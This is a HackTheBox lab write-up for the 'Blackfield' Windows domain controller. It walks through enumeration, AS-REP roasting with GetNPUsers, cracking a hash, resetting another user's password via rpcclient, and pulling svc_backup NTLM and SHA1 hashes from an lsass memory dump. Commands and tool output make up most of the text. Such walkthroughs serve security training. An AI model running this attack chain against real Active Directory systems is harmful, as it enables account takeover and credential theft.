HackTheBox — Blackfield

Summary

It’s windows machine rated as hard with IP 10.10.10.192
Let’s get start!

Enumeration

root@strike:~# nmap -sC -sV 10.10.10.192
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-12 14:09 EET
Nmap scan report for blackfield.htb (10.10.10.192)
Host is up (0.12s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-12 19:15:30Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=6/12%Time=5EE37098%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h05m34s, deviation: 0s, median: 7h05m34s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-12 21:17:49
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.13 seconds
root@strike:~#

So we have many ports open: 53, 88, 135, 389 and more
I used enum4linux to get more info

root@strike:~# enum4linux blackfield.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jun 12 14:18:36 2020

==========================
| Target Information |
==========================
Target ........... blackfield.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


======================================================
| Enumerating Workgroup/Domain on blackfield.htb |
======================================================
[E] Can't find workgroup/domain


==============================================
| Nbtstat Information for blackfield.htb |
==============================================
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
Looking up status of 10.10.10.192
No reply from 10.10.10.192

=======================================
| Session Check on blackfield.htb |
=======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server blackfield.htb allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

=============================================
| Getting domain SID for blackfield.htb |
=============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290
[+] Host is part of a domain (not a workgroup)

========================================
| OS information on blackfield.htb |
========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for blackfield.htb from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for blackfield.htb from srvinfo:
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

===============================
| Users on blackfield.htb |
===============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

===========================================
| Share Enumeration on blackfield.htb |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
WARNING: The "encrypt passwords" option is deprecated
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
WARNING: The "null passwords" option is deprecated

Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on blackfield.htb

root@strike:~#

So we got the domain name is BLACKFIELD
I tried to login anonymously with Smbclient

I found 2 shares: forensic, profiles$

I tried to see the content of forensic share but i got Access_Denied

I tried to see the content of profiles$ and i got it

root@strike:~# smbclient -U " "%" "  \\\\10.10.10.192\\profiles$
WARNING: The "encrypt passwords" option is deprecated
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
WARNING: The "null passwords" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 3 18:47:12 2020
.. D 0 Wed Jun 3 18:47:12 2020
AAlleni D 0 Wed Jun 3 18:47:11 2020
ABarteski D 0 Wed Jun 3 18:47:11 2020
ABekesz D 0 Wed Jun 3 18:47:11 2020
ABenzies D 0 Wed Jun 3 18:47:11 2020
ABiemiller D 0 Wed Jun 3 18:47:11 2020
AChampken D 0 Wed Jun 3 18:47:11 2020
ACheretei D 0 Wed Jun 3 18:47:11 2020
ACsonaki D 0 Wed Jun 3 18:47:11 2020
AHigchens D 0 Wed Jun 3 18:47:11 2020
AJaquemai D 0 Wed Jun 3 18:47:11 2020
AKlado D 0 Wed Jun 3 18:47:11 2020
AKoffenburger D 0 Wed Jun 3 18:47:11 2020
AKollolli D 0 Wed Jun 3 18:47:11 2020
AKruppe D 0 Wed Jun 3 18:47:11 2020
AKubale D 0 Wed Jun 3 18:47:11 2020
ALamerz D 0 Wed Jun 3 18:47:11 2020
AMaceldon D 0 Wed Jun 3 18:47:11 2020
AMasalunga D 0 Wed Jun 3 18:47:11 2020
ANavay D 0 Wed Jun 3 18:47:11 2020
ANesterova D 0 Wed Jun 3 18:47:11 2020
ANeusse D 0 Wed Jun 3 18:47:11 2020
AOkleshen D 0 Wed Jun 3 18:47:11 2020
APustulka D 0 Wed Jun 3 18:47:11 2020
ARotella D 0 Wed Jun 3 18:47:11 2020
ASanwardeker D 0 Wed Jun 3 18:47:11 2020
AShadaia D 0 Wed Jun 3 18:47:11 2020
ASischo D 0 Wed Jun 3 18:47:11 2020
ASpruce D 0 Wed Jun 3 18:47:11 2020
ATakach D 0 Wed Jun 3 18:47:11 2020
ATaueg D 0 Wed Jun 3 18:47:11 2020
ATwardowski D 0 Wed Jun 3 18:47:11 2020
audit2020 D 0 Wed Jun 3 18:47:11 2020
AWangenheim D 0 Wed Jun 3 18:47:11 2020
AWorsey D 0 Wed Jun 3 18:47:11 2020
AZigmunt D 0 Wed Jun 3 18:47:11 2020
BBakajza D 0 Wed Jun 3 18:47:11 2020
BBeloucif D 0 Wed Jun 3 18:47:11 2020
BCarmitcheal D 0 Wed Jun 3 18:47:11 2020
BConsultant D 0 Wed Jun 3 18:47:11 2020
BErdossy D 0 Wed Jun 3 18:47:11 2020
BGeminski D 0 Wed Jun 3 18:47:11 2020
BLostal D 0 Wed Jun 3 18:47:11 2020
BMannise D 0 Wed Jun 3 18:47:11 2020
BNovrotsky D 0 Wed Jun 3 18:47:11 2020
BRigiero D 0 Wed Jun 3 18:47:11 2020
BSamkoses D 0 Wed Jun 3 18:47:11 2020
BZandonella D 0 Wed Jun 3 18:47:11 2020
CAcherman D 0 Wed Jun 3 18:47:12 2020
CAkbari D 0 Wed Jun 3 18:47:12 2020
CAldhowaihi D 0 Wed Jun 3 18:47:12 2020
CArgyropolous D 0 Wed Jun 3 18:47:12 2020
CDufrasne D 0 Wed Jun 3 18:47:12 2020
CGronk D 0 Wed Jun 3 18:47:11 2020
Chiucarello D 0 Wed Jun 3 18:47:11 2020
Chiuccariello D 0 Wed Jun 3 18:47:12 2020
CHoytal D 0 Wed Jun 3 18:47:12 2020
CKijauskas D 0 Wed Jun 3 18:47:12 2020
CKolbo D 0 Wed Jun 3 18:47:12 2020
CMakutenas D 0 Wed Jun 3 18:47:12 2020
CMorcillo D 0 Wed Jun 3 18:47:11 2020
CSchandall D 0 Wed Jun 3 18:47:12 2020
CSelters D 0 Wed Jun 3 18:47:12 2020
CTolmie D 0 Wed Jun 3 18:47:12 2020
DCecere D 0 Wed Jun 3 18:47:12 2020
DChintalapalli D 0 Wed Jun 3 18:47:12 2020
DCwilich D 0 Wed Jun 3 18:47:12 2020
DGarbatiuc D 0 Wed Jun 3 18:47:12 2020
DKemesies D 0 Wed Jun 3 18:47:12 2020
DMatuka D 0 Wed Jun 3 18:47:12 2020
DMedeme D 0 Wed Jun 3 18:47:12 2020
DMeherek D 0 Wed Jun 3 18:47:12 2020
DMetych D 0 Wed Jun 3 18:47:12 2020
DPaskalev D 0 Wed Jun 3 18:47:12 2020
DPriporov D 0 Wed Jun 3 18:47:12 2020
DRusanovskaya D 0 Wed Jun 3 18:47:12 2020
DVellela D 0 Wed Jun 3 18:47:12 2020
DVogleson D 0 Wed Jun 3 18:47:12 2020
DZwinak D 0 Wed Jun 3 18:47:12 2020
EBoley D 0 Wed Jun 3 18:47:12 2020
EEulau D 0 Wed Jun 3 18:47:12 2020
EFeatherling D 0 Wed Jun 3 18:47:12 2020
EFrixione D 0 Wed Jun 3 18:47:12 2020
EJenorik D 0 Wed Jun 3 18:47:12 2020
EKmilanovic D 0 Wed Jun 3 18:47:12 2020
ElKatkowsky D 0 Wed Jun 3 18:47:12 2020
EmaCaratenuto D 0 Wed Jun 3 18:47:12 2020
EPalislamovic D 0 Wed Jun 3 18:47:12 2020
EPryar D 0 Wed Jun 3 18:47:12 2020
ESachhitello D 0 Wed Jun 3 18:47:12 2020
ESariotti D 0 Wed Jun 3 18:47:12 2020
ETurgano D 0 Wed Jun 3 18:47:12 2020
EWojtila D 0 Wed Jun 3 18:47:12 2020
FAlirezai D 0 Wed Jun 3 18:47:12 2020
FBaldwind D 0 Wed Jun 3 18:47:12 2020
FBroj D 0 Wed Jun 3 18:47:12 2020
FDeblaquire D 0 Wed Jun 3 18:47:12 2020
FDegeorgio D 0 Wed Jun 3 18:47:12 2020
FianLaginja D 0 Wed Jun 3 18:47:12 2020
FLasokowski D 0 Wed Jun 3 18:47:12 2020
FPflum D 0 Wed Jun 3 18:47:12 2020
FReffey D 0 Wed Jun 3 18:47:12 2020
GaBelithe D 0 Wed Jun 3 18:47:12 2020
Gareld D 0 Wed Jun 3 18:47:12 2020
GBatowski D 0 Wed Jun 3 18:47:12 2020
GForshalger D 0 Wed Jun 3 18:47:12 2020
GGomane D 0 Wed Jun 3 18:47:12 2020
GHisek D 0 Wed Jun 3 18:47:12 2020
GMaroufkhani D 0 Wed Jun 3 18:47:12 2020
GMerewether D 0 Wed Jun 3 18:47:12 2020
GQuinniey D 0 Wed Jun 3 18:47:12 2020
GRoswurm D 0 Wed Jun 3 18:47:12 2020
GWiegard D 0 Wed Jun 3 18:47:12 2020
HBlaziewske D 0 Wed Jun 3 18:47:12 2020
HColantino D 0 Wed Jun 3 18:47:12 2020
HConforto D 0 Wed Jun 3 18:47:12 2020
HCunnally D 0 Wed Jun 3 18:47:12 2020
HGougen D 0 Wed Jun 3 18:47:12 2020
HKostova D 0 Wed Jun 3 18:47:12 2020
IChristijr D 0 Wed Jun 3 18:47:12 2020
IKoledo D 0 Wed Jun 3 18:47:12 2020
IKotecky D 0 Wed Jun 3 18:47:12 2020
ISantosi D 0 Wed Jun 3 18:47:12 2020
JAngvall D 0 Wed Jun 3 18:47:12 2020
JBehmoiras D 0 Wed Jun 3 18:47:12 2020
JDanten D 0 Wed Jun 3 18:47:12 2020
JDjouka D 0 Wed Jun 3 18:47:12 2020
JKondziola D 0 Wed Jun 3 18:47:12 2020
JLeytushsenior D 0 Wed Jun 3 18:47:12 2020
JLuthner D 0 Wed Jun 3 18:47:12 2020
JMoorehendrickson D 0 Wed Jun 3 18:47:12 2020
JPistachio D 0 Wed Jun 3 18:47:12 2020
JScima D 0 Wed Jun 3 18:47:12 2020
JSebaali D 0 Wed Jun 3 18:47:12 2020
JShoenherr D 0 Wed Jun 3 18:47:12 2020
JShuselvt D 0 Wed Jun 3 18:47:12 2020
KAmavisca D 0 Wed Jun 3 18:47:12 2020
KAtolikian D 0 Wed Jun 3 18:47:12 2020
KBrokinn D 0 Wed Jun 3 18:47:12 2020
KCockeril D 0 Wed Jun 3 18:47:12 2020
KColtart D 0 Wed Jun 3 18:47:12 2020
KCyster D 0 Wed Jun 3 18:47:12 2020
KDorney D 0 Wed Jun 3 18:47:12 2020
KKoesno D 0 Wed Jun 3 18:47:12 2020
KLangfur D 0 Wed Jun 3 18:47:12 2020
KMahalik D 0 Wed Jun 3 18:47:12 2020
KMasloch D 0 Wed Jun 3 18:47:12 2020
KMibach D 0 Wed Jun 3 18:47:12 2020
KParvankova D 0 Wed Jun 3 18:47:12 2020
KPregnolato D 0 Wed Jun 3 18:47:12 2020
KRasmor D 0 Wed Jun 3 18:47:12 2020
KShievitz D 0 Wed Jun 3 18:47:12 2020
KSojdelius D 0 Wed Jun 3 18:47:12 2020
KTambourgi D 0 Wed Jun 3 18:47:12 2020
KVlahopoulos D 0 Wed Jun 3 18:47:12 2020
KZyballa D 0 Wed Jun 3 18:47:12 2020
LBajewsky D 0 Wed Jun 3 18:47:12 2020
LBaligand D 0 Wed Jun 3 18:47:12 2020
LBarhamand D 0 Wed Jun 3 18:47:12 2020
LBirer D 0 Wed Jun 3 18:47:12 2020
LBobelis D 0 Wed Jun 3 18:47:12 2020
LChippel D 0 Wed Jun 3 18:47:12 2020
LChoffin D 0 Wed Jun 3 18:47:12 2020
LCominelli D 0 Wed Jun 3 18:47:12 2020
LDruge D 0 Wed Jun 3 18:47:12 2020
LEzepek D 0 Wed Jun 3 18:47:12 2020
LHyungkim D 0 Wed Jun 3 18:47:12 2020
LKarabag D 0 Wed Jun 3 18:47:12 2020
LKirousis D 0 Wed Jun 3 18:47:12 2020
LKnade D 0 Wed Jun 3 18:47:12 2020
LKrioua D 0 Wed Jun 3 18:47:12 2020
LLefebvre D 0 Wed Jun 3 18:47:12 2020
LLoeradeavilez D 0 Wed Jun 3 18:47:12 2020
LMichoud D 0 Wed Jun 3 18:47:12 2020
LTindall D 0 Wed Jun 3 18:47:12 2020
LYturbe D 0 Wed Jun 3 18:47:12 2020
MArcynski D 0 Wed Jun 3 18:47:12 2020
MAthilakshmi D 0 Wed Jun 3 18:47:12 2020
MAttravanam D 0 Wed Jun 3 18:47:12 2020
MBrambini D 0 Wed Jun 3 18:47:12 2020
MHatziantoniou D 0 Wed Jun 3 18:47:12 2020
MHoerauf D 0 Wed Jun 3 18:47:12 2020
MKermarrec D 0 Wed Jun 3 18:47:12 2020
MKillberg D 0 Wed Jun 3 18:47:12 2020
MLapesh D 0 Wed Jun 3 18:47:12 2020
MMakhsous D 0 Wed Jun 3 18:47:12 2020
MMerezio D 0 Wed Jun 3 18:47:12 2020
MNaciri D 0 Wed Jun 3 18:47:12 2020
MShanmugarajah D 0 Wed Jun 3 18:47:12 2020
MSichkar D 0 Wed Jun 3 18:47:12 2020
MTemko D 0 Wed Jun 3 18:47:12 2020
MTipirneni D 0 Wed Jun 3 18:47:12 2020
MTonuri D 0 Wed Jun 3 18:47:12 2020
MVanarsdel D 0 Wed Jun 3 18:47:12 2020
NBellibas D 0 Wed Jun 3 18:47:12 2020
NDikoka D 0 Wed Jun 3 18:47:12 2020
NGenevro D 0 Wed Jun 3 18:47:12 2020
NGoddanti D 0 Wed Jun 3 18:47:12 2020
NMrdirk D 0 Wed Jun 3 18:47:12 2020
NPulido D 0 Wed Jun 3 18:47:12 2020
NRonges D 0 Wed Jun 3 18:47:12 2020
NSchepkie D 0 Wed Jun 3 18:47:12 2020
NVanpraet D 0 Wed Jun 3 18:47:12 2020
OBelghazi D 0 Wed Jun 3 18:47:12 2020
OBushey D 0 Wed Jun 3 18:47:12 2020
OHardybala D 0 Wed Jun 3 18:47:12 2020
OLunas D 0 Wed Jun 3 18:47:12 2020
ORbabka D 0 Wed Jun 3 18:47:12 2020
PBourrat D 0 Wed Jun 3 18:47:12 2020
PBozzelle D 0 Wed Jun 3 18:47:12 2020
PBranti D 0 Wed Jun 3 18:47:12 2020
PCapperella D 0 Wed Jun 3 18:47:12 2020
PCurtz D 0 Wed Jun 3 18:47:12 2020
PDoreste D 0 Wed Jun 3 18:47:12 2020
PGegnas D 0 Wed Jun 3 18:47:12 2020
PMasulla D 0 Wed Jun 3 18:47:12 2020
PMendlinger D 0 Wed Jun 3 18:47:12 2020
PParakat D 0 Wed Jun 3 18:47:12 2020
PProvencer D 0 Wed Jun 3 18:47:12 2020
PTesik D 0 Wed Jun 3 18:47:12 2020
PVinkovich D 0 Wed Jun 3 18:47:12 2020
PVirding D 0 Wed Jun 3 18:47:12 2020
PWeinkaus D 0 Wed Jun 3 18:47:12 2020
RBaliukonis D 0 Wed Jun 3 18:47:12 2020
RBochare D 0 Wed Jun 3 18:47:12 2020
RKrnjaic D 0 Wed Jun 3 18:47:12 2020
RNemnich D 0 Wed Jun 3 18:47:12 2020
RPoretsky D 0 Wed Jun 3 18:47:12 2020
RStuehringer D 0 Wed Jun 3 18:47:12 2020
RSzewczuga D 0 Wed Jun 3 18:47:12 2020
RVallandas D 0 Wed Jun 3 18:47:12 2020
RWeatherl D 0 Wed Jun 3 18:47:12 2020
RWissor D 0 Wed Jun 3 18:47:12 2020
SAbdulagatov D 0 Wed Jun 3 18:47:12 2020
SAjowi D 0 Wed Jun 3 18:47:12 2020
SAlguwaihes D 0 Wed Jun 3 18:47:12 2020
SBonaparte D 0 Wed Jun 3 18:47:12 2020
SBouzane D 0 Wed Jun 3 18:47:12 2020
SChatin D 0 Wed Jun 3 18:47:12 2020
SDellabitta D 0 Wed Jun 3 18:47:12 2020
SDhodapkar D 0 Wed Jun 3 18:47:12 2020
SEulert D 0 Wed Jun 3 18:47:12 2020
SFadrigalan D 0 Wed Jun 3 18:47:12 2020
SGolds D 0 Wed Jun 3 18:47:12 2020
SGrifasi D 0 Wed Jun 3 18:47:12 2020
SGtlinas D 0 Wed Jun 3 18:47:12 2020
SHauht D 0 Wed Jun 3 18:47:12 2020
SHederian D 0 Wed Jun 3 18:47:12 2020
SHelregel D 0 Wed Jun 3 18:47:12 2020
SKrulig D 0 Wed Jun 3 18:47:12 2020
SLewrie D 0 Wed Jun 3 18:47:12 2020
SMaskil D 0 Wed Jun 3 18:47:12 2020
Smocker D 0 Wed Jun 3 18:47:12 2020
SMoyta D 0 Wed Jun 3 18:47:12 2020
SRaustiala D 0 Wed Jun 3 18:47:12 2020
SReppond D 0 Wed Jun 3 18:47:12 2020
SSicliano D 0 Wed Jun 3 18:47:12 2020
SSilex D 0 Wed Jun 3 18:47:12 2020
SSolsbak D 0 Wed Jun 3 18:47:12 2020
STousignaut D 0 Wed Jun 3 18:47:12 2020
support D 0 Wed Jun 3 18:47:12 2020
svc_backup D 0 Wed Jun 3 18:47:12 2020
SWhyte D 0 Wed Jun 3 18:47:12 2020
SWynigear D 0 Wed Jun 3 18:47:12 2020
TAwaysheh D 0 Wed Jun 3 18:47:12 2020
TBadenbach D 0 Wed Jun 3 18:47:12 2020
TCaffo D 0 Wed Jun 3 18:47:12 2020
TCassalom D 0 Wed Jun 3 18:47:12 2020
TEiselt D 0 Wed Jun 3 18:47:12 2020
TFerencdo D 0 Wed Jun 3 18:47:12 2020
TGaleazza D 0 Wed Jun 3 18:47:12 2020
TKauten D 0 Wed Jun 3 18:47:12 2020
TKnupke D 0 Wed Jun 3 18:47:12 2020
TLintlop D 0 Wed Jun 3 18:47:12 2020
TMusselli D 0 Wed Jun 3 18:47:12 2020
TOust D 0 Wed Jun 3 18:47:12 2020
TSlupka D 0 Wed Jun 3 18:47:12 2020
TStausland D 0 Wed Jun 3 18:47:12 2020
TZumpella D 0 Wed Jun 3 18:47:12 2020
UCrofskey D 0 Wed Jun 3 18:47:12 2020
UMarylebone D 0 Wed Jun 3 18:47:12 2020
UPyrke D 0 Wed Jun 3 18:47:12 2020
VBublavy D 0 Wed Jun 3 18:47:12 2020
VButziger D 0 Wed Jun 3 18:47:12 2020
VFuscca D 0 Wed Jun 3 18:47:12 2020
VLitschauer D 0 Wed Jun 3 18:47:12 2020
VMamchuk D 0 Wed Jun 3 18:47:12 2020
VMarija D 0 Wed Jun 3 18:47:12 2020
VOlaosun D 0 Wed Jun 3 18:47:12 2020
VPapalouca D 0 Wed Jun 3 18:47:12 2020
WSaldat D 0 Wed Jun 3 18:47:12 2020
WVerzhbytska D 0 Wed Jun 3 18:47:12 2020
WZelazny D 0 Wed Jun 3 18:47:12 2020
XBemelen D 0 Wed Jun 3 18:47:12 2020
XDadant D 0 Wed Jun 3 18:47:12 2020
XDebes D 0 Wed Jun 3 18:47:12 2020
XKonegni D 0 Wed Jun 3 18:47:12 2020
XRykiel D 0 Wed Jun 3 18:47:12 2020
YBleasdale D 0 Wed Jun 3 18:47:12 2020
YHuftalin D 0 Wed Jun 3 18:47:12 2020
YKivlen D 0 Wed Jun 3 18:47:12 2020
YKozlicki D 0 Wed Jun 3 18:47:12 2020
YNyirenda D 0 Wed Jun 3 18:47:12 2020
YPredestin D 0 Wed Jun 3 18:47:12 2020
YSeturino D 0 Wed Jun 3 18:47:12 2020
YSkoropada D 0 Wed Jun 3 18:47:12 2020
YVonebers D 0 Wed Jun 3 18:47:12 2020
YZarpentine D 0 Wed Jun 3 18:47:12 2020
ZAlatti D 0 Wed Jun 3 18:47:12 2020
ZKrenselewski D 0 Wed Jun 3 18:47:12 2020
ZMalaab D 0 Wed Jun 3 18:47:12 2020
ZMiick D 0 Wed Jun 3 18:47:12 2020
ZScozzari D 0 Wed Jun 3 18:47:12 2020
ZTimofeeff D 0 Wed Jun 3 18:47:12 2020
ZWausik D 0 Wed Jun 3 18:47:12 2020

7846143 blocks of size 4096. 3379904 blocks available
smb: \>

So i think to dump this directories names to see if i could use it like usernames!
Now after dumping the users in users.txt file, I used GetNPUsers tool to got Ticket Granting Ticket

root@strike:~/Desktop# python /root/Desktop/HTB/Windows-EX/getnpusers.py BLACKFIELD.LOCAL/ -usersfile users.txt -format john -outputfile hashes.txt -dc-ip 10.10.10.192
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
more...
root@strike:~/Desktop#

So i got the hash for support user

I tried to crack the hash with john the ripper

After crack, I tried to use this credentials to login in with rpcclient
After login i tried to enumerate users and privs

root@strike:~/Desktop# rpcclient 10.10.10.192 -U support
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
Enter WORKGROUP\support's password:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
root@strike:~/Desktop# rpcclient 10.10.10.192 -U support
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
Enter WORKGROUP\support's password:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]
rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege 0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3)
SeLockMemoryPrivilege 0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 0:5 (0x0:0x5)
SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeTcbPrivilege 0:7 (0x0:0x7)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SeLoadDriverPrivilege 0:10 (0x0:0xa)
SeSystemProfilePrivilege 0:11 (0x0:0xb)
SeSystemtimePrivilege 0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe)
SeCreatePagefilePrivilege 0:15 (0x0:0xf)
SeCreatePermanentPrivilege 0:16 (0x0:0x10)
SeBackupPrivilege 0:17 (0x0:0x11)
SeRestorePrivilege 0:18 (0x0:0x12)
SeShutdownPrivilege 0:19 (0x0:0x13)
SeDebugPrivilege 0:20 (0x0:0x14)
SeAuditPrivilege 0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 0:22 (0x0:0x16)
SeChangeNotifyPrivilege 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 0:24 (0x0:0x18)
SeUndockPrivilege 0:25 (0x0:0x19)
SeSyncAgentPrivilege 0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 0:27 (0x0:0x1b)
SeManageVolumePrivilege 0:28 (0x0:0x1c)
SeImpersonatePrivilege 0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f)
SeRelabelPrivilege 0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21)
SeTimeZonePrivilege 0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
rpcclient $>

One of the privs this user have, He can change other user’s password
(Ref: https://malicious.link/post/2017/reset-ad-user-password-with-linux/)
After tried, I could reset the password of user audit2020

rpcclient $> setuserinfo2 audit2020 23 'fixed0X'

Login with this credentials

root@strike:~/Desktop# smbclient  //blackfield.htb/forensic -U audit2020
WARNING: The "encrypt passwords" option is deprecated
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
WARNING: The "null passwords" option is deprecated
Enter WORKGROUP\audit2020's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 15:03:16 2020
.. D 0 Sun Feb 23 15:03:16 2020
commands_output D 0 Sun Feb 23 20:14:37 2020
memory_analysis D 0 Thu May 28 22:28:33 2020
tools D 0 Sun Feb 23 15:39:08 2020

7846143 blocks of size 4096. 3459074 blocks available
smb: \> cd memory_analysis\
smb: \memory_analysis\> ls
. D 0 Thu May 28 22:28:33 2020
.. D 0 Thu May 28 22:28:33 2020
conhost.zip A 37876530 Thu May 28 22:25:36 2020
ctfmon.zip A 24962333 Thu May 28 22:25:45 2020
dfsrs.zip A 23993305 Thu May 28 22:25:54 2020
dllhost.zip A 18366396 Thu May 28 22:26:04 2020
ismserv.zip A 8810157 Thu May 28 22:26:13 2020
lsass.zip A 41936098 Thu May 28 22:25:08 2020
mmc.zip A 64288607 Thu May 28 22:25:25 2020
RuntimeBroker.zip A 13332174 Thu May 28 22:26:24 2020
ServerManager.zip A 131983313 Thu May 28 22:26:49 2020
sihost.zip A 33141744 Thu May 28 22:27:00 2020
smartscreen.zip A 33756344 Thu May 28 22:27:11 2020
svchost.zip A 14408833 Thu May 28 22:27:19 2020
taskhostw.zip A 34631412 Thu May 28 22:27:30 2020
winlogon.zip A 14255089 Thu May 28 22:27:38 2020
wlms.zip A 4067425 Thu May 28 22:27:44 2020
WmiPrvSE.zip A 18303252 Thu May 28 22:27:53 2020

7846143 blocks of size 4096. 3459072 blocks available
smb: \memory_analysis\> get lsass.zip
getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip (1539.4 KiloBytes/sec) (average 1539.4 KiloBytes/sec)
smb: \memory_analysis\>

After searching, I tried to download lsass.zip, After unzip i found lsass.DMP file

DMP extension is a memory dump file which created when the program crashws
So we can dump some useful information like NTLM hashform this file using Mimiatiz
(Ref: https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf)

Authentication Id : 0 ; 406458 (00000000:000633ba)
Session : Interactive from 2
User Name : svc_backup
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23-02-2020 23:30:03
SID : S-1-5-21-4194615774-2175524697-3563712290-1413
msv :
[00000003] Primary
* Username : svc_backup
* Domain : BLACKFIELD
* NTLM : 9658d1d1dcd9250115e2205d9f48400d
* SHA1 : 463c13a9a31fc3252c68ba0a44f0221626a33e5c
* DPAPI : a03cd8e9d30171f3cfe8caad92fef621
tspkg :
wdigest :
* Username : svc_backup
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : svc_backup
* Domain : BLACKFIELD.LOCAL
* Password : (null)
ssp :
credman :


